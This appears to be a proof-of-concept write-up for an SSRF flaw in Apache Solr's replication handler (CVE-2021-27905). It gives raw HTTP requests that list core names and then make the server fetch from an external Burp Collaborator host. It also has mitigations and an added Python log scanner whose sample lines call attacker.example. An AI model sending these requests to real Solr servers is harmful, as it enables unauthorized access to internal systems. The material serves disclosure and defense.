
PoC details: a915baa63d090fe61bc380e169bf288e8ce6ff38

Related vulnerability
Title: Apache Solr code issue vulnerability (CVE-2021-27905)
Description: Apache Solr is a search server from the Apache Software Foundation (US) built on Lucene (a full-text search engine). It supports faceted search, vertical search, search-result highlighting and more. Apache Solr versions before 8.8.2 contain a code issue vulnerability: an attacker can use the masterUrl parameter to replicate index data into a local core.
Introduction
<b>[CVE-2021-27905] Apache Solr ReplicationHandler Server Side Request Forgery (SSRF)</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
![Platform Badge](https://img.shields.io/badge/Platform-Apache%20Solr-critical?logo=apachesolr&style=plastic)

Apache Solr (stands for Searching On Lucene with Replication) is a free, open-source search engine based on the Apache Lucene library and written in Java. Apache Solr has RESTful XML/HTTP and JSON APIs and client libraries for many programming languages, such as Java, Python, Ruby, C# and PHP, and is used to build search-based and big data analytics applications for websites, databases, files, etc.

Apache Solr `all versions prior to 8.8.2 (7.0.0 to 7.7.3 and 8.0.0 to 8.8.1)` are vulnerable to Server Side Request Forgery (SSRF). Successful exploitation of this vulnerability may lead to unauthorized actions or access to data within the organization, either in the vulnerable application itself or on other backend systems that the application can communicate with.

The ReplicationHandler (normally registered at `/replication` under a Solr core) has a `masterUrl` (also `leaderUrl` alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent an SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the `shards` parameter. Prior to this vulnerability getting fixed, it did not.

<b>Proof of Concept (PoC):</b> In order to exploit this vulnerability, an attacker has to know a core name on the Apache Solr instance, so the following request is used to list the core names.

```
GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1
Host: vulnerablehost:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

```
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Connection: close

{
    "responseHeader":
    {
        "status": 0,
        "QTime": 0
    },
    "initFailures":
    {},
    "status":
    {
        "beliana_dev":
        {
            "name": "beliana_dev",
            "instanceDir": "/var/solr/data/beliana_dev",
            "dataDir": "/var/solr/data/beliana_dev/data/",
            "config": "solrconfig.xml",
            "schema": "schema.xml",
            "startTime": "2021-04-20T13:49:06.569Z",
            "uptime": 293226747
        },
        "beliana_prod":
        {
            "name": "beliana_prod",
            "instanceDir": "/var/solr/data/beliana_prod",
            "dataDir": "/var/solr/data/beliana_prod/data/",
            "config": "solrconfig.xml",
            "schema": "schema.xml",
            "startTime": "2021-02-02T06:07:19.668Z",
            "uptime": 6973733649
        },
        "beliana_stage":
        {
            "name": "beliana_stage",
            "instanceDir": "/var/solr/data/beliana_stage",
            "dataDir": "/var/solr/data/beliana_stage/data/",
            "config": "solrconfig.xml",
            "schema": "schema.xml",
            "startTime": "2021-02-02T06:07:19.668Z",
            "uptime": 6973733649
        }
    }
}
```

![1](https://user-images.githubusercontent.com/16391655/128835594-6a049d76-a6f1-48bb-935d-19d7741d9f20.png)

After determining the core names, select one of them and make a request to this endpoint: `/solr/{core_name}/replication/?command=fetchindex&masterUrl={ssrf_here}`

```
GET /solr/beliana_dev/replication/?command=fetchindex&masterUrl=http://4rwzji8a3i6xi33sjoml8qdda4gv4k.burpcollaborator.net HTTP/1.1
Host: vulnerablehost:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

```xml
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Sat, 01 Jan 2000 01:00:00 GMT
Last-Modified: Fri, 23 Apr 2021 23:16:50 GMT
ETag: "1790105893b"
Content-Type: application/xml; charset=UTF-8
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<response>
    <lst name="responseHeader">
        <int name="status">0</int>
        <int name="QTime">75</int>
    </lst>
    <str name="status">OK</str>
</response>
```

![2](https://user-images.githubusercontent.com/16391655/128836560-2177f465-495e-4fdb-900c-973dca7cdf0a.png)

![3](https://user-images.githubusercontent.com/16391655/128836568-d4bf2ec9-896c-480d-84e7-af76dc536bb7.png)

<b>Mitigation:</b> Any of the following is enough to prevent this vulnerability:

* Upgrade to Solr `8.8.2` or greater.
* If upgrading is not an option, consider applying the patch in [SOLR-15217](https://issues.apache.org/jira/browse/SOLR-15217).
* Ensure that any access to the replication handler is purely internal to Solr. Typically, it's only accessed externally for diagnostic/informational purposes.
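As an added defender-side example (not part of the original README or of Solr's own code), the kind of allow-list check the text above says Solr should apply to `masterUrl`/`leaderUrl`, reused to scan request-log lines for `fetchindex` calls that point outside the allow-list. The allow-list, host names and log lines are constructed assumptions for illustration; the log-line shape follows Solr's request log but is not taken from a real host.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed allow-list of host:port pairs this node may replicate from; in a real
# deployment this would mirror the configuration Solr uses for the shards allow-list.
ALLOWED_LEADERS = {"solr-leader.internal:8983"}

# Shape of a Solr request-log line: "... [core]  webapp=/solr path=/... params={...} ..."
_LOG_RE = re.compile(
    r"\[(?P<core>[^\]]+)\]\s+webapp=\S+\s+path=(?P<path>\S+)\s+params=\{(?P<params>[^}]*)\}"
)

def master_url_allowed(url, allowed=ALLOWED_LEADERS):
    """True only if url is http(s) and its effective host:port is allow-listed.
    urlsplit().hostname discards userinfo, so "http://good:8983@evil/" resolves to
    "evil", which a naive string-prefix check would have accepted."""
    try:
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            return False
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:  # malformed port such as http://host:abc/
        return False
    return f"{parts.hostname}:{port}" in allowed

def scan_request_log(lines, allowed=ALLOWED_LEADERS):
    """Return (core, param, url) for every fetchindex request whose masterUrl or
    leaderUrl (the alias mentioned in the advisory) points outside the allow-list."""
    hits = []
    for line in lines:
        m = _LOG_RE.search(line)
        if not m or not m.group("path").startswith("/replication"):
            continue
        params = parse_qs(m.group("params"))
        if "fetchindex" not in params.get("command", []):
            continue
        for key in ("masterUrl", "leaderUrl"):
            for url in params.get(key, []):
                if not master_url_allowed(url, allowed):
                    hits.append((m.group("core"), key, url))
    return hits

# Constructed sample lines in Solr's request-log style (not from a real host).
SAMPLE_LOG = [
    "2021-04-23 23:16:50.123 INFO  (qtp1-14) [   x:beliana_dev] o.a.s.c.S.Request [beliana_dev]  webapp=/solr path=/replication/ params={command=fetchindex&masterUrl=http://attacker.example:80/} status=0 QTime=75",
    "2021-04-23 23:17:02.456 INFO  (qtp1-15) [   x:beliana_prod] o.a.s.c.S.Request [beliana_prod]  webapp=/solr path=/replication params={command=fetchindex&leaderUrl=http://solr-leader.internal:8983/solr/beliana_prod} status=0 QTime=12",
    "2021-04-23 23:17:10.789 INFO  (qtp1-16) [   x:beliana_dev] o.a.s.c.S.Request [beliana_dev]  webapp=/solr path=/select params={q=*:*&wt=json} hits=3 status=0 QTime=1",
    "2021-04-23 23:17:20.000 INFO  (qtp1-17) [   x:beliana_dev] o.a.s.c.S.Request [beliana_dev]  webapp=/solr path=/replication params={command=fetchindex&masterUrl=http://solr-leader.internal:8983@attacker.example/} status=0 QTime=3",
]
```

Running `scan_request_log(SAMPLE_LOG)` flags the two `beliana_dev` requests and accepts the `beliana_prod` replication from the allow-listed leader.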

<b>References:</b>

* [https://github.com/apache/solr-site/blob/eb060a0d2cf1d31de403665407fff7a0255578ec/content/solr/security/2021-04-12-cve-2021-27905.md](https://github.com/apache/solr-site/blob/eb060a0d2cf1d31de403665407fff7a0255578ec/content/solr/security/2021-04-12-cve-2021-27905.md)
* [https://github.com/apache/solr/pull/47/files/c12bbae4da0719435cf5e19623f6dad83f0c8c65#diff-838f63a8d7b764661b66c758c19cfe6f3d6454b328a1b5f52f75480530b0cfe7](https://github.com/apache/solr/pull/47/files/c12bbae4da0719435cf5e19623f6dad83f0c8c65#diff-838f63a8d7b764661b66c758c19cfe6f3d6454b328a1b5f52f75480530b0cfe7)
* [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27905](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27905)
* [https://www.anquanke.com/post/id/238201](https://www.anquanke.com/post/id/238201)